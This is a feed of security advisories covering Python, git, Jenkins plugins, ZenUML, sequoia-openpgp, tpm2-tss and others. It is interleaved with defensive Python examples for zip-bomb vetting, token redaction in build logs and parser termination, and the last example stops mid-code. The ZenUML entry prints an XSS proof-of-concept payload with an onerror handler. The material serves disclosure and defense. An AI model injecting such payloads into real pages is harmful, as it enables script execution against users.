25.06.2024 03:00:00redhat[RHSA-2024:4077] python3.11 security update (important)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4077
25.06.2024 03:00:00redhat[RHSA-2024:4084] git security update (important)Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection. Security Fix(es): * git: Recursive clones RCE (CVE-2024-32002) * git: RCE while cloning local repos (CVE-2024-32004) * git: additional local RCE (CVE-2024-32465) * git: insecure hardlinks (CVE-2024-32020) * git: symlink bypass (CVE-2024-32021) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4084
25.06.2024 03:00:00redhat[RHSA-2024:4078] python3.9 security update (important)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597) * python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4078
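CVE-2024-0450, listed in the RHSA-2024:4058 and RHSA-2024:4078 python entries above, is the "quoted-overlap" zip bomb: central-directory entries whose local data regions overlap, so a small archive declares a huge total output. The guard below is an added example, not CPython's patch, showing the checks an application should run on an untrusted archive before `extractall()`: an overlap check on local header offsets, a bound on declared size and compression ratio, and a byte-counting read that does not trust the declared size at all. The thresholds and the in-memory sample archives are constructed for the example.

```python
import io
import zipfile
from typing import Iterable, List

LOCAL_HEADER_FIXED = 30  # bytes of a local file header before filename and extra field


class ZipRejected(ValueError):
    """The archive failed a safety check and must not be extracted."""


def infos_of(data: bytes) -> List[zipfile.ZipInfo]:
    """Central-directory entries of an in-memory archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.infolist()


def check_overlap(infos: Iterable[zipfile.ZipInfo]) -> None:
    """Reject entries whose local header + data regions overlap (the layout a
    quoted-overlap bomb relies on). The region length is a lower bound (no
    extra field, no data descriptor), so anything flagged genuinely overlaps."""
    ordered = sorted(infos, key=lambda i: i.header_offset)
    for prev, nxt in zip(ordered, ordered[1:]):
        prev_end = (prev.header_offset + LOCAL_HEADER_FIXED
                    + len(prev.orig_filename) + prev.compress_size)
        if nxt.header_offset < prev_end:
            raise ZipRejected(f"{nxt.filename!r} overlaps {prev.filename!r}")


def check_declared_size(infos: Iterable[zipfile.ZipInfo], archive_size: int,
                        max_ratio: float, max_total: int) -> int:
    """Bound the declared total output and its ratio to the archive size and
    return the declared total. Declared sizes can be forged, so this is a
    first filter only; read_member_capped() is the backstop."""
    total = sum(i.file_size for i in infos)
    if total > max_total:
        raise ZipRejected(f"declares {total} bytes, limit is {max_total}")
    if archive_size and total / archive_size > max_ratio:
        raise ZipRejected(f"ratio {total / archive_size:.0f}:1 exceeds {max_ratio}")
    return total


def vet_archive(data: bytes, max_ratio: float = 200.0,
                max_total: int = 512 * 1024 * 1024) -> int:
    """Run both structural checks; the thresholds are illustrative assumptions."""
    infos = infos_of(data)
    check_overlap(infos)
    return check_declared_size(infos, len(data), max_ratio, max_total)


def read_member_capped(data: bytes, name: str, max_bytes: int) -> bytes:
    """Decompress one member while counting real output bytes, aborting as soon
    as the cap is crossed instead of trusting ZipInfo.file_size."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as fh:
        while True:
            chunk = fh.read(64 * 1024)
            if not chunk:
                return out.getvalue()
            out.write(chunk)
            if out.tell() > max_bytes:
                raise ZipRejected(f"{name!r} exceeded {max_bytes} bytes")


def make_zip(members: List[tuple]) -> bytes:
    """Build a small DEFLATE archive in memory (constructed sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members:
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed samples: a harmless archive, and a 1 MiB run of zeros that
# deflates to roughly 1 KiB and therefore declares a ~1000:1 ratio.
PLAIN_ZIP = make_zip([("a.txt", b"hello\n"), ("b.txt", b"world\n")])
ZEROS_ZIP = make_zip([("zeros.bin", b"\0" * (1 << 20))])

if __name__ == "__main__":
    for label, data in (("plain", PLAIN_ZIP), ("zeros", ZEROS_ZIP)):
        try:
            print(label, "declares", vet_archive(data), "bytes")
        except ZipRejected as exc:
            print(label, "rejected:", exc)
```

A real overlap bomb is awkward to build with the standard library's writer, so the overlap check is exercised by rewriting one entry's `header_offset` onto another's; the ratio and capped-read checks run against the genuinely high-ratio zeros archive.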
25.06.2024 03:00:00redhat[RHSA-2024:4083] git security update (important)Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection. Security Fix(es): * git: Recursive clones RCE (CVE-2024-32002) * git: RCE while cloning local repos (CVE-2024-32004) * git: additional local RCE (CVE-2024-32465) * git: insecure hardlinks (CVE-2024-32020) * git: symlink bypass (CVE-2024-32021) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4083
25.06.2024 03:00:00freebsd[FREEBSD:2B68C86A-32D5-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixesChrome Releases reports: This update includes 5 security fixes: [342428008] High CVE-2024-6290: Use after free in Dawn. Reported by wgslfuzz on 2024-05-23 [40942995] High CVE-2024-6291: Use after free in Swiftshader. Reported by Cassidy Kim(@cassidy6564) on 2023-11-15 [342545100] High CVE-2024-6292: Use after free in Dawn. Reported by wgslfuzz on 2024-05-24 [345993680] High CVE-2024-6293: Use after free in Dawn. Reported by wgslfuzz on 2024-06-09https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:2B68C86A-32D5-11EF-8A0F-A8A1599412C6
26.06.2024 22:45:59ubuntu[USN-6566-2] SQLite vulnerability (high)SQLite could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6566-2
27.06.2024 00:56:17npm[NPM:GHSA-MP3G-VPM9-9VQV] @fastly/js-compute has a use-after-free in some host call implementations (moderate)### ImpactThe implementations of the following functions were determined to include a use-after-free bug:* `FetchEvent.client.tlsCipherOpensslName`* `FetchEvent.client.tlsProtocol`* `FetchEvent.client.tlsClientCertificate`* `FetchEvent.client.tlsJA3MD5`* `FetchEvent.client.tlsClientHello`* `CacheEntry.prototype.userMetadata` of the `fastly:cache` subsystem* `Device.lookup` of the `fastly:device` subsystemThis bug could allow for an unintended data leak if the result of the preceding functions were sent anywhere else, and often results in a Compute service crash causing an HTTP 500 error to be returned. As all requests to Compute are isolated from one another, the only data at risk is data present for a single request.### PatchesThis bug has been fixed in version 3.16.0 of the `@fastly/js-compute` package.### WorkaroundsThere are no workarounds for this bug; any use of the affected functions introduces the possibility of a data leak or crash in guest code.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MP3G-VPM9-9VQV
27.06.2024 00:56:15npm[NPM:GHSA-Q6XV-JM4V-349H] Cross-site Scripting in ZenUML (moderate)### SummaryMarkdown-based comments in the ZenUML diagram syntax are susceptible to Cross-site Scripting (XSS).### DetailsThe comment feature allows the user to attach small notes for reference. This feature allows the user to enter their comment in markdown, allowing them to use common markdown features, such as `**` for bolded text. However, the markdown text is currently not sanitized before rendering, allowing an attacker to enter a malicious payload for the comment which leads to XSS.https://github.com/mermaid-js/zenuml-core/blob/dcfee8cde42673c09e19401f43ad8506658c8442/src/components/DiagramFrame/SeqDiagram/MessageLayer/Block/Statement/Comment/Comment.vue#L65### PoC```// p<img onerror=alert(1) src=""/>A->B:hi```Above is a PoC diagram payload that results in an XSS.Here is a similar PoC in mermaid.live: https://mermaid.live/edit#pako:eNpNjrFuwyAQhl8F3dRK1DaQGhs1kVq1Y6duFQsylwTVgEWw1MTyuxc5S7df39399y0wRIug4IZh9qMOdU2mF-dPJAZMKaa9GTHlB_ZILmnYa9BQH3R4fTq8qbMDCh6TN86WhkUHQjTkM3rUoEq0Jv2Ui7CWPTPn-HUNA6icZqQwT9ZkfHfmlIwHdTTjpVC0Lsf0eVfazChMJoBa4BdUL6uGC8n7TrCGd5zCFRRnXbVjvBVNK3gJXbtSuMVYSlnFC-Kyf961UshWbmXf2-y_xcf29c7WP2yrVC0### ImpactThis puts existing applications that use ZenUML **unsandboxed** at risk of arbitrary JavaScript execution when rendering user-controlled diagrams.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q6XV-JM4V-349H
26.06.2024 23:00:06maven[MAVEN:GHSA-X8MF-JCMF-R79F] Bitbucket OAuth access token exposed in the build log by Bitbucket Branch Source Plugin (moderate)Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.Bitbucket Branch Source Plugin 887.va_d359b_3d2d8d does not include the Bitbucket OAuth access token as part of the Bitbucket URL in the build log.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X8MF-JCMF-R79F
26.06.2024 23:07:12maven[MAVEN:GHSA-3CPQ-RW36-CPPV] Secret file credentials stored unencrypted in rare cases by Plain Credentials Plugin (moderate)When creating secret file credentials Plain Credentials Plugin 182.v468b_97b_9dcb_8 and earlier attempts to decrypt the content of the file to check if it constitutes a valid encrypted secret. In rare cases the file content matches the expected format of an encrypted secret, and the file content will be stored unencrypted (only Base64 encoded) on the Jenkins controller file system.These credentials can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).Plain Credentials Plugin 183.va_de8f1dd5a_2b_ no longer attempts to decrypt the content of the file when creating secret file credentials.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3CPQ-RW36-CPPV
26.06.2024 23:03:46maven[MAVEN:GHSA-XFX3-CR74-X3CV] Exposure of secrets through system log in Jenkins Structs Plugin (low)Structs Plugin provides utility functionality used, e.g., in Pipeline to instantiate and configure build steps, typically before their execution.When Structs Plugin 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters.This can result in accidental exposure of secrets through the default system log.Structs Plugin 338.v848422169819 inspects the types of actual parameters before logging these warning messages, and limits detailed diagnostic information to FINE level log messages if secrets are involved. These log messages are not displayed in the default Jenkins system log.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XFX3-CR74-X3CV
26.06.2024 16:45:31ubuntu[USN-6851-1] Netplan vulnerabilities (medium)Netplan could reveal secrets or execute commands with a specially crafted configuration file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6851-1
26.06.2024 16:01:54ubuntu[USN-6819-4] Linux kernel (Oracle) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-4
26.06.2024 15:27:29ubuntu[USN-6853-1] Ruby vulnerabilityRuby could be made to crash or expose sensitive information if it processed certain strings.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6853-1
26.06.2024 15:20:33ubuntu[USN-6852-1] Wget vulnerabilityWget could be made to connect to a different host than expected.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6852-1
26.06.2024 15:12:09ubuntu[USN-6843-1] Plasma Workspace vulnerabilityplasma-workspace would allow unintended access to the session manager.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6843-1
26.06.2024 04:06:38ubuntu[USN-6850-1] OpenVPN vulnerability (critical)OpenVPN could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6850-1
26.06.2024 03:00:00cisa[CISA-2024:0626] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0626
26.06.2024 03:00:00cpan[CPANSA-Mojo-DOM-Role-Analyzer-2024-38526] Mojo-DOM-Role-Analyzer vulnerability (high)pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Mojo-DOM-Role-Analyzer-2024-38526
26.06.2024 03:00:00cpan[CPANSA-Mojolicious-Plugin-LazyImage-2024-38526] Mojolicious-Plugin-LazyImage vulnerability (high)pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Mojolicious-Plugin-LazyImage-2024-38526
26.06.2024 03:00:00debian[DSA-5721-1] ffmpeg (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5721-1
26.06.2024 03:00:00debian[DSA-5722-1] libvpxsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5722-1
26.06.2024 03:00:00jenkins[JENKINS:SECURITY-3363] Bitbucket OAuth access token exposed in the build log by `cloudbees-bitbucket-branch-source` (medium)`cloudbees-bitbucket-branch-source` 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.`cloudbees-bitbucket-branch-source` 887.va_d359b_3d2d8d does not include the Bitbucket OAuth access token as part of the Bitbucket URL in the build log.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3363
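The two Bitbucket Branch Source entries above (MAVEN:GHSA-X8MF-JCMF-R79F and JENKINS:SECURITY-3363) describe the same failure mode: an OAuth access token embedded in a URL survives into a build log that many more people can read than the credential itself. The following is an added example, not code from the Jenkins plugin or from the advisory, of the detection and redaction step a log-shipping or build-archival job would run over console output. It scans each line for URLs, flags credentials in the userinfo part (`user:secret@host`) and in query parameters such as `access_token`, rewrites them to `REDACTED`, and reports the line numbers so the build can be alerted on and the token rotated. The log lines and token values are constructed placeholders; the `SECRET_PARAMS` list is an assumption you should extend for your own providers.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameters that carry bearer-style secrets when they end up in a URL
# (assumed list; extend for the providers your jobs talk to).
SECRET_PARAMS = {"access_token", "oauth_token", "token", "client_secret", "private_token"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def redact_url(url: str):
    """Return (redacted_url, leaked_fields) for one URL.

    leaked_fields names what was found: 'userinfo' for user:secret@host
    credentials, otherwise the offending query-parameter name.
    """
    parts = urlsplit(url)
    leaked = []
    netloc = parts.netloc
    if "@" in netloc:
        userinfo, host = netloc.rsplit("@", 1)
        if ":" in userinfo:                      # a bare username is not a secret
            user = userinfo.split(":", 1)[0]
            netloc = f"{user}:REDACTED@{host}"
            leaked.append("userinfo")
    query = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in SECRET_PARAMS and value:
            leaked.append(key)
            value = "REDACTED"
        query.append((key, value))
    redacted = urlunsplit((parts.scheme, netloc, parts.path, urlencode(query), parts.fragment))
    return redacted, leaked


def scan_build_log(lines):
    """Redact every URL in the log; return (clean_lines, findings).

    findings is a list of (line_number, leaked_fields) so a detection job can
    alert on the build and the operator can rotate the exposed token.
    """
    clean, findings = [], []
    for lineno, line in enumerate(lines, start=1):
        hits = []

        def _sub(match):
            redacted, leaked = redact_url(match.group(0))
            hits.extend(leaked)
            return redacted

        clean.append(URL_RE.sub(_sub, line))
        if hits:
            findings.append((lineno, hits))
    return clean, findings


# Constructed sample console output; the token values are placeholders, not real credentials.
SAMPLE_LOG = [
    "Started by user alice",
    "Checking out https://x-token-auth:AbCdEf123@bitbucket.org/acme/api.git",
    "GET https://api.bitbucket.org/2.0/repositories/acme/api/refs?access_token=s3cr3t&pagelen=50",
    "GET https://api.bitbucket.org/2.0/repositories/acme/api?pagelen=50",
    "Finished: SUCCESS",
]

if __name__ == "__main__":
    cleaned, found = scan_build_log(SAMPLE_LOG)
    for lineno, fields in found:
        print(f"line {lineno}: credential exposed via {', '.join(fields)}")
    print("\n".join(cleaned))
```

Redaction at archive time does not undo the exposure: anyone who could read the console while the build ran has already seen the token, so a finding should feed a rotation workflow, not just a cleaner log.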
26.06.2024 03:00:00jenkins[JENKINS:SECURITY-3371] Exposure of secrets through system log in `structs` (low)`structs` provides utility functionality used, e.g., in Pipeline to instantiate and configure build steps, typically before their execution.When `structs` 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters.This can result in accidental exposure of secrets through the default system log.`structs` 338.v848422169819 inspects the types of actual parameters before logging these warning messages, and limits detailed diagnostic information to FINE level log messages if secrets are involved.These log messages are not displayed in the default Jenkins system log.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3371
26.06.2024 03:00:00jenkins[JENKINS:SECURITY-2495] Secret file credentials stored unencrypted in rare cases by `plain-credentials` (medium)When creating secret file credentials `plain-credentials` 182.v468b_97b_9dcb_8 and earlier attempts to decrypt the content of the file to check if it constitutes a valid encrypted secret.In rare cases the file content matches the expected format of an encrypted secret, and the file content will be stored unencrypted (only Base64 encoded) on the Jenkins controller file system.These credentials can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).NOTE: Secret file credentials stored unencrypted are unusable, as they would be decrypted during their use.Any successfully used secret file credentials are therefore unaffected.`plain-credentials` 183.va_de8f1dd5a_2b_ no longer attempts to decrypt the content of the file when creating secret file credentials.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-2495
26.06.2024 17:13:16rustsec[RUSTSEC-2024-0345] Low severity (DoS) vulnerability in sequoia-openpgpThere is a denial-of-service vulnerability in sequoia-openpgp, our crate providing a low-level interface to our OpenPGP implementation.When triggered, the process will enter an infinite loop.Many thanks to Andrew Gallagher for disclosing the issue to us.## ImpactAny software directly or indirectly using the interface `sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.## DetailsThe `RawCertParser` does not advance the input stream when encountering unsupported cert (primary key) versions, resulting in an infinite loop.The fix introduces a new raw-cert-specific `cert::raw::Error::UnsupportedCert`.## Affected software- sequoia-openpgp 1.13.0- sequoia-openpgp 1.14.0- sequoia-openpgp 1.15.0- sequoia-openpgp 1.16.0- sequoia-openpgp 1.17.0- sequoia-openpgp 1.18.0- sequoia-openpgp 1.19.0- sequoia-openpgp 1.20.0- Any software built against a vulnerable version of sequoia-openpgp which is directly or indirectly using the interface `sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0345
26.06.2024 23:54:44go[GO-2024-2937] Panic when parsing invalid palette-color images in golang.org/x/imageParsing a corrupt or malicious image with invalid color indices can cause a panic.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2937
27.06.2024 18:52:04ubuntu[USN-5615-3] SQLite vulnerability (high)SQLite could be made to crash or execute arbitrary code.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-5615-3
27.06.2024 13:48:19ubuntu[USN-6857-1] Squid vulnerabilities (high)Several security issues were fixed in Squid.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6857-1
27.06.2024 13:42:13ubuntu[USN-6852-2] Wget vulnerabilityWget could be made to connect to a different host than expected.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6852-2
27.06.2024 12:52:34ubuntu[USN-6856-1] FontForge vulnerabilitiesSeveral security issues were fixed in FontForge.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6856-1
27.06.2024 10:22:53ubuntu[USN-6855-1] libcdio vulnerabilitylibcdio could be made to crash or run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6855-1
27.06.2024 10:15:54alpinelinux[ALPINE:CVE-2024-22232] salt vulnerability (high)[From CVE-2024-22232] A specially crafted url can be created which leads to a directory traversal in the salt file server.A malicious user can read an arbitrary file from a Salt master’s filesystem.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-22232
27.06.2024 10:15:52alpinelinux[ALPINE:CVE-2024-22231] salt vulnerability (medium)[From CVE-2024-22231] Syndic cache directory creation is vulnerable to a directory traversal attack in salt project which can lead a malicious attacker to create an arbitrary directory on a Salt master.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-22231
27.06.2024 07:10:47go[GO-2023-2331] Denial of service in go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc (high)The grpc Unary Server Interceptor created by the otelgrpc package added the labels net.peer.sock.addr and net.peer.sock.port with unbounded cardinality.This can lead to the server's potential memory exhaustion when many malicious requests are sent. This leads to a denial-of-service.https://secdb.nttzen.cloud/security-advisory/go/GO-2023-2331
27.06.2024 06:05:54ubuntu[USN-6854-1] OpenSSL vulnerability (high)OpenSSL could be made to consume resources and cause long delays if it processed certain input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6854-1
27.06.2024 23:01:45almalinux[ALSA-2024:4165] pki-core security update (important)pki-core security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4165
27.06.2024 03:00:00debian[DSA-5723-1] plasma-workspacesecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5723-1
27.06.2024 03:00:00oraclelinux[ELSA-2024-4165] pki-core security update (important)[11.5.0-2.0.1]- Replaced upstream graphical references [Orabug: 33952704][11.5.0-2]- RHEL-9916 CVE-2023-4727 pki-core: dogtag ca: token authentication bypass vulnerabilityhttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4165
27.06.2024 03:00:00redhat[RHSA-2024:4160] java-1.8.0-ibm security update (moderate)IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.Security Fix(es):* IBM JDK: Object Request Broker (ORB) denial of service (CVE-2023-38264)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4160
27.06.2024 03:00:00redhat[RHSA-2024:4165] pki-core security update (important)The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* dogtag ca: token authentication bypass vulnerability (CVE-2023-4727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4165
27.06.2024 03:00:00vmware[OMSA-2024-0001] VMware Workspace One UEM update addresses an information exposure vulnerability (CVE-2024-22260) (moderate)https://secdb.nttzen.cloud/security-advisory/vmware/OMSA-2024-0001
27.06.2024 03:00:00freebsd[FREEBSD:589DE937-343F-11EF-8A7B-001B217B3468] Gitlab -- Vulnerabilities (critical)Gitlab reports: Run pipelines as any user; Stored XSS injected in imported project's commit notes; CSRF on GraphQL API IntrospectionQuery; Remove search results from public projects with unauthorized repos; Cross window forgery in user application OAuth flow; Project maintainers can bypass group's merge request approval policy; ReDoS via custom built markdown page; Private job artifacts can be accessed by any user; Security fixes for banzai pipeline; ReDoS in dependency linker; Denial of service using a crafted OpenAPI file; Merge request title disclosure; Access issues and epics without having an SSO session; Non project member can promote key results to objectiveshttps://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:589DE937-343F-11EF-8A7B-001B217B3468
27.06.2024 15:08:11rustsec[RUSTSEC-2024-0345] Low severity (DoS) vulnerability in sequoia-openpgpThere is a denial-of-service vulnerability in sequoia-openpgp, our crate providing a low-level interface to our OpenPGP implementation.When triggered, the process will enter an infinite loop.Many thanks to Andrew Gallagher for disclosing the issue to us.## ImpactAny software directly or indirectly using the interface `sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.## DetailsThe `RawCertParser` does not advance the input stream when encountering unsupported cert (primary key) versions, resulting in an infinite loop.The fix introduces a new raw-cert-specific `cert::raw::Error::UnsupportedCert`.## Affected software- sequoia-openpgp 1.13.0- sequoia-openpgp 1.14.0- sequoia-openpgp 1.15.0- sequoia-openpgp 1.16.0- sequoia-openpgp 1.17.0- sequoia-openpgp 1.18.0- sequoia-openpgp 1.19.0- sequoia-openpgp 1.20.0- Any software built against a vulnerable version of sequoia-openpgp which is directly or indirectly using the interface `sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0345
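Both RUSTSEC-2024-0345 entries above describe the same parser defect: on an unsupported certificate version the `RawCertParser` reported the problem without consuming the offending record, so the next iteration re-read the same bytes and the process never terminated. The following is an added example, not sequoia-openpgp code, that reproduces the pattern on a constructed record framing (1-byte version, 2-byte big-endian length, body; version 4 stands in for "supported") and places the buggy loop beside the fixed one. The fix is to advance past the whole record before deciding whether it is usable, and to check a progress invariant so a future branch cannot reintroduce the loop. The framing, the version set and the sample records are all assumptions made for this demonstration.

```python
from itertools import islice

# Constructed framing for the demonstration: 1-byte version, 2-byte big-endian
# length, then the body. Version 4 stands in for a supported cert; anything else
# is "unsupported", as a v6 key was for the affected sequoia-openpgp releases.
SUPPORTED_VERSIONS = {4}


def record(version: int, body: bytes) -> bytes:
    """Frame one record (test-data builder)."""
    return bytes([version]) + len(body).to_bytes(2, "big") + body


def _header(buf: bytes, pos: int):
    """Return (version, body_length) for the record at pos; raise on truncation."""
    if pos + 3 > len(buf):
        raise ValueError("truncated record header")
    version = buf[pos]
    length = int.from_bytes(buf[pos + 1:pos + 3], "big")
    if pos + 3 + length > len(buf):
        raise ValueError("truncated record body")
    return version, length


def parse_records_buggy(buf: bytes):
    """Mirror of the defect: the unsupported branch reports an error but never
    consumes the record, so the next iteration re-reads the same header forever."""
    pos = 0
    while pos < len(buf):
        version, length = _header(buf, pos)
        if version not in SUPPORTED_VERSIONS:
            yield ("error", f"unsupported version {version}")
            continue                       # BUG: pos is unchanged
        yield ("cert", buf[pos + 3:pos + 3 + length])
        pos += 3 + length


def parse_records(buf: bytes):
    """Fixed form: consume the record first, then decide whether it is usable,
    and enforce the progress invariant so the loop is guaranteed to terminate."""
    pos = 0
    while pos < len(buf):
        start = pos
        version, length = _header(buf, pos)
        pos += 3 + length                  # always advance past the whole record
        if version not in SUPPORTED_VERSIONS:
            yield ("error", f"unsupported version {version}")
        else:
            yield ("cert", buf[start + 3:pos])
        if pos <= start:                   # progress invariant; cheap insurance
            raise RuntimeError("parser failed to advance")


def first_n_buggy(buf: bytes, n: int) -> list:
    """Take at most n results from the buggy parser (bounded so the demo terminates)."""
    return list(islice(parse_records_buggy(buf), n))


SAMPLE = record(4, b"keyA") + record(6, b"v6key") + record(4, b"keyB")   # constructed input

if __name__ == "__main__":
    print("fixed :", list(parse_records(SAMPLE)))
    print("buggy :", first_n_buggy(SAMPLE, 4), "... and so on, forever")
```

A keyserver or certificate store that feeds untrusted input to such a parser should treat "error but no progress" as a bug class to test for: a single unsupported record in a batch is enough to pin the process.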
29.06.2024 00:15:02alpinelinux[ALPINE:CVE-2024-29040] tpm2-tss vulnerability (medium)[From CVE-2024-29040] This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This issue has been patched in version 4.1.0.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-29040
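The tpm2-tss entry above turns on one field: a verifier that accepts any value for the `magic` of a `TPMS_ATTEST` cannot tell a TPM-produced quote from a structure the attested device fabricated. The TPM 2.0 Library specification fixes that field to `TPM_GENERATED_VALUE`, 0xFF544347 (the bytes 0xFF "TCG"), and a quote has type `TPM_ST_ATTEST_QUOTE` (0x8018). The following is an added example, not tpm2-tss code, that parses the binary `TPMS_ATTEST` header, rejects anything whose magic or type is wrong before looking at the rest, and then checks that the `extraData` field carries the nonce the verifier issued. The advisory concerns the JSON form that `Fapi_VerifyQuote` deserialises; the rule enforced here is the same one applied to the wire structure. The `build_attest` helper constructs test blobs and is not output from a real TPM; the signer name and clock values in it are arbitrary.

```python
import struct

# TPM 2.0 Library Part 2: TPM_GENERATED_VALUE is 0xFF544347 ("\xffTCG") and must
# open every TPMS_ATTEST the TPM signs; a verifier that skips this check accepts
# attacker-built attestation structures.
TPM_GENERATED_VALUE = 0xFF544347
TPM_ST_ATTEST_QUOTE = 0x8018


class AttestError(ValueError):
    """Raised when a TPMS_ATTEST blob fails structural or policy checks."""


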